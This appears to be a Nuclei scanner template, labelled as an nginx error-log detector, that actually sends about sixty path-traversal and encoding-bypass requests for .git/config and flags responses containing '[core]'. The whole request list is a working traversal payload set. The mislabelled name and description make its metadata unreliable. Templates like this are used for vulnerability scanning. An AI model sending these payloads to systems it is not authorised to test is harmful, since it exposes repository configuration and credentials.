id: ngix_projeto_1

info:
  name: Error Log Files Detect
  author: Redflare-Cyber
  severity: medium
  description: Error log files were exposed, enhanced from official nuclei templates with added paths and matchers.
  metadata:
    max-request: 29
    shodan-query: html:"error.log"
  tags: nginx

http:
  - method: GET
    path:
      - "{{BaseURL}}..;/.git/config"
      - "{{BaseURL}}../.git/config"
      - "{{BaseURL}}..%3B/.git/config"
      - "{{BaseURL}}/...git/config"
      - "{{BaseURL}}....//.git/config"
      - "{{BaseURL}}//.....git/config"
      - "{{BaseURL}}%252e%252e%255c.git/config"
      - "{{BaseURL}}%2e%2e%5c.git/config"
      - "{{BaseURL}}..%255c.git/config"
      - "{{BaseURL}}..%5c.git/config"
      - "{{BaseURL}}%5c../.git/config"
      - "{{BaseURL}}/%5c...git/config"
      - "{{BaseURL}}..\\.git/config"
      - "{{BaseURL}}%2e%2e%2f.git/config"
      - "{{BaseURL}}../.git/config"
      - "{{BaseURL}}..%2f.git/config"
      - "{{BaseURL}}%2e%2e/.git/config"
      - "{{BaseURL}}%2e%2e%2f.git/config"
      - "{{BaseURL}}..%252f.git/config"
      - "{{BaseURL}}%252e%252e/.git/config"
      - "{{BaseURL}}%252e%252e%252f.git/config"
      - "{{BaseURL}}..%5c..%5c.git/config"
      - "{{BaseURL}}%2e%2e\\.git/config"
      - "{{BaseURL}}%2e%2e%5c.git/config"
      - "{{BaseURL}}%252e%252e\\.git/config"
      - "{{BaseURL}}%252e%252e%255c.git/config"
      - "{{BaseURL}}..%c0%af.git/config"
      - "{{BaseURL}}%c0%ae%c0%ae/.git/config"
      - "{{BaseURL}}%c0%ae%c0%ae%c0%af.git/config"
      - "{{BaseURL}}..%25c0%25af.git/config"
      - "{{BaseURL}}%25c0%25ae%25c0%25ae/.git/config"
      - "{{BaseURL}}%25c0%25ae%25c0%25ae%25c0%25af.git/config"
      - "{{BaseURL}}..%c1%9c.git/config"
      - "{{BaseURL}}%c0%ae%c0%ae\\.git/config"
      - "{{BaseURL}}%c0%ae%c0%ae%c1%9c.git/config"
      - "{{BaseURL}}..%25c1%259c.git/config"
      - "{{BaseURL}}%25c0%25ae%25c0%25ae\\.git/config"
      - "{{BaseURL}}%25c0%25ae%25c0%25ae%25c1%259c.git/config"
      - "{{BaseURL}}..%%32%66.git/config"
      - "{{BaseURL}}%%32%65%%32%65/.git/config"
      - "{{BaseURL}}%%32%65%%32%65%%32%66.git/config"
      - "{{BaseURL}}..%%35%63.git/config"
      - "{{BaseURL}}%%32%65%%32%65/.git/config"
      - "{{BaseURL}}%%32%65%%32%65%%35%63.git/config"
      - "{{BaseURL}}../.git/config"
      - "{{BaseURL}}...\\.git/config"
      - "{{BaseURL}}..../.git/config"
      - "{{BaseURL}}....\\.git/config"
      - "{{BaseURL}}........................................................................../.git/config"
      - "{{BaseURL}}..........................................................................\\.git/config"
      - "{{BaseURL}}..%u2215.git/config"
      - "{{BaseURL}}%uff0e%uff0e%u2215.git/config"
      - "{{BaseURL}}..%u2216.git/config"
      - "{{BaseURL}}..%uEFC8.git/config"
      - "{{BaseURL}}..%uF025.git/config"
      - "{{BaseURL}}%uff0e%uff0e\\.git/config"
      - "{{BaseURL}}%uff0e%uff0e%u2216.git/config"
      - "{{BaseURL}}%FF%2E%FF%2E/config"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '[core]'

        condition: or

      - type: status
        status:
          - 200